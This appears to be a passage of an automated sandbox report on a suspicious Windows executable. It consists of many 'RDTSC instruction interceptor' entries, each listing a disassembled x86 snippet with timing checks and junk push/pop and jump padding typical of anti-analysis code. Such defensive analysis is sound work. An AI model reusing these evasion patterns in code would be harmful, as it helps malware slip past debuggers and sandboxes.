Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56586C second address: 56588D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8124CF45A4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56588D second address: 565891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56848E second address: 568492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56B1F3 second address: 56B200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE40 second address: 56FE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8124CF4596h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE50 second address: 56FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE56 second address: 56FE5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE5E second address: 56FE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 jmp 00007F8124DF87CDh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE78 second address: 56FE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FE7D second address: 56FEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D5h 0x00000007 push ecx 0x00000008 jmp 00007F8124DF87D7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56F619 second address: 56F61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FA24 second address: 56FA40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007F8124DF87C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007F8124DF87C6h 0x00000013 jl 00007F8124DF87C6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FA40 second address: 56FA46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 56FA46 second address: 56FA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57C359 second address: 57C361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57B632 second address: 57B655 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57BAF8 second address: 57BB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57BB00 second address: 57BB05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57C0A7 second address: 57C0AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57C0AB second address: 57C0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8124DF87CEh 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 57C22A second address: 57C23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8124CF4596h 0x0000000a jl 00007F8124CF4596h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5818B8 second address: 5818E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8124DF87C6h 0x00000008 jnp 00007F8124DF87C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8124DF87D9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 580502 second address: 58052A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A4h 0x00000007 jmp 00007F8124CF45A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 580A9C second address: 580AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 580AA0 second address: 580AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 581209 second address: 581226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 581226 second address: 581239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F8124CF459Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 581239 second address: 58126D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F8124DF87C6h 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F8124DF87D8h 0x00000018 pushad 0x00000019 jnp 00007F8124DF87C6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 58126D second address: 581277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 58159B second address: 5815AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8124DF87CCh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54C8E7 second address: 54C903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8124CF45A3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54C903 second address: 54C969 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jnp 00007F8124DF87C8h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 nop 0x00000013 movzx ecx, ax 0x00000016 lea eax, dword ptr [ebp+124815E5h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F8124DF87C8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jne 00007F8124DF87CBh 0x0000003c nop 0x0000003d jmp 00007F8124DF87CDh 0x00000042 push eax 0x00000043 pushad 0x00000044 jg 00007F8124DF87C8h 0x0000004a push ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54CFB3 second address: 54CFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jp 00007F8124CF4596h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54CFC0 second address: 54CFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F8124DF87D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8124DF87D0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54CFF2 second address: 54CFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D0F7 second address: 54D0FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D0FC second address: 54D112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F8124CF459Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D112 second address: 54D11C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124DF87CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D1B0 second address: 54D224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8124CF45A3h 0x00000009 popad 0x0000000a mov dword ptr [esp], esi 0x0000000d jmp 00007F8124CF45A7h 0x00000012 nop 0x00000013 jnc 00007F8124CF45B5h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8124CF45A9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D315 second address: 54D31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D31B second address: 54D31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DCEC second address: 54DD60 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8124DF87CFh 0x0000000d nop 0x0000000e or dword ptr [ebp+122D1DC0h], ecx 0x00000014 lea eax, dword ptr [ebp+12481629h] 0x0000001a push edi 0x0000001b push edi 0x0000001c cmc 0x0000001d pop edx 0x0000001e pop edi 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007F8124DF87D6h 0x00000026 pushad 0x00000027 jne 00007F8124DF87C6h 0x0000002d jmp 00007F8124DF87CFh 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8124DF87D6h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DD60 second address: 54DD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DD66 second address: 54DD6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DD6C second address: 54DDA0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 lea eax, dword ptr [ebp+124815E5h] 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F8124CF4598h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DDA0 second address: 54DDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54DDA5 second address: 536168 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8124CF4598h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8124CF459Bh 0x00000011 jne 00007F8124CF459Ch 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F8124CF4598h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 call dword ptr [ebp+122D2202h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F8124CF45A8h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 536168 second address: 536171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 536171 second address: 536198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F8124CF45B4h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8124CF45A6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 588FC8 second address: 588FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 58912F second address: 589143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 589143 second address: 589147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5910C8 second address: 5910CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5910CC second address: 5910E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8124DF87D7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5910E9 second address: 59112F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8124CF459Ch 0x00000008 jl 00007F8124CF4596h 0x0000000e jmp 00007F8124CF45A6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F8124CF4596h 0x0000001f jmp 00007F8124CF45A6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59112F second address: 59113B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8124DF87C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591265 second address: 59126B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59126B second address: 59126F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59126F second address: 591282 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8124CF4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jne 00007F8124CF4596h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5913E1 second address: 5913E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5913E7 second address: 591435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8124CF459Eh 0x00000009 popad 0x0000000a jmp 00007F8124CF459Fh 0x0000000f popad 0x00000010 jg 00007F8124CF45C2h 0x00000016 je 00007F8124CF45B2h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591718 second address: 591729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F8124DF87C8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591729 second address: 59172E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5919F3 second address: 5919FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5919FD second address: 591A07 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124CF459Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591C78 second address: 591C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591C7E second address: 591C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591F21 second address: 591F2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F8124DF87C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 591F2C second address: 591F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8124CF4596h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F8124CF45A5h 0x00000013 push edi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F8124CF4596h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59208C second address: 5920D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F8124DF87CFh 0x0000000b popad 0x0000000c jmp 00007F8124DF87D2h 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 je 00007F8124DF87E3h 0x0000001e jng 00007F8124DF87D5h 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F8124DF87CDh 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 590DBE second address: 590DC8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8124CF459Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 590DC8 second address: 590DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jnp 00007F8124DF87C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5957E4 second address: 5957E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5957E9 second address: 5957FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124DF87D2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59A064 second address: 59A068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 514320 second address: 51433D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D3h 0x00000007 jl 00007F8124DF87C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EADC second address: 59EAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EAE0 second address: 59EB02 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8124DF87C6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8124DF87D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EB02 second address: 59EB08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EB08 second address: 59EB18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124DF87C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EC6B second address: 59EC79 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8124CF4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EC79 second address: 59EC89 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8124DF87CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EC89 second address: 59EC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8124CF4596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59EC93 second address: 59ECDA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007F8124DF8807h 0x00000012 jc 00007F8124DF87DFh 0x00000018 jmp 00007F8124DF87CEh 0x0000001d jmp 00007F8124DF87CBh 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8124DF87D4h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 59F36E second address: 59F374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
